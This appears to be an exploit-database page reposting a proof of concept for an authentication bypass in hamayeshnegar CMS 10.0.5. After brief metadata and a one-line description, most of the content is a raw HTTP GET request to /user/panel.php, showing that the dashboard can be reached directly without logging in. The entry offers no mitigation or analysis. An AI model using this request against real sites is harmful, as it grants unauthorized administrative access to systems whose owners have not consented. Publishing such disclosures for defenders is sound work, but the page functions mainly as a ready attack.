Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.io


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070138

Below is a copy:

hamayeshnegar CMS 10.0.5 - Authentication Bypass
#Exploit Title: hamayeshnegar CMS 10.0.5 - Authentication Bypass
#Date: 2021-01-12
#Exploit Author: Aryan Chehreghani
#Vendor Homepage: https://hamayeshnegar.com
#Version: 10.0.5
#Tested on: MAC
###########################################################
#Description 
#Vulnerability: Attacker can bypass login page and access to dashboard page
#PYALOAD : /user/login.php realase to /user/panel.php
###########################################################
#Proof of Concept : 
============
GET /user/panel.php
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=rb61ffogr9f7rckpafavo8kkf4
Upgrade-Insecure-Requests: 1
###########################################################
TAPESH DIGITAL SECURITY TEAM IRAN T.ME/ICTUS_TM  |    

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.